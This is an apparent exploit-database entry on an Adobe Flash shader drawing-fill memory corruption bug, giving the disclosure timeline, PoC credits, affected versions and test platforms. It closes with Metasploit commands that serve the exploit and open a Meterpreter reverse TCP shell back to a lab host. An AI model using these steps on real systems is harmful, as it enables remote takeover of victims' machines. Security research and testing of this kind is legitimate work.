Timeline :
Vulnerability discovered and reported to the vendor by Chris Evans of Google Project Zero
Patch provided by the vendor via APSB15-11 on 2015-06-09
Vulnerability discovered being exploited in exploit kits on 2015-06-16
Metasploit PoC provided on 2015-06-25
PoC provided by :
Chris Evans
Unknown
juan vazquez
Reference(s) :
Affected version(s) :
Adobe Flash Player 16.0.0.305 and earlier versions
Adobe Flash Player 11.2.202.442 and earlier 11.x versions
Tested on :
Windows 7 SP1 (64-bit), IE8 and Adobe Flash 17.0.0.188
Description :
This module exploits a memory corruption happening when applying a Shader as a drawing fill, as exploited in the wild in June 2015. This module has been tested successfully on:
* Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188
* Linux Mint “Rebecca” (32-bit), Firefox 33.0 and Adobe Flash 11.2.202.460
Commands :
use exploit/multi/browser/adobe_flash_shader_drawing_fill
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run
getuid
sysinfo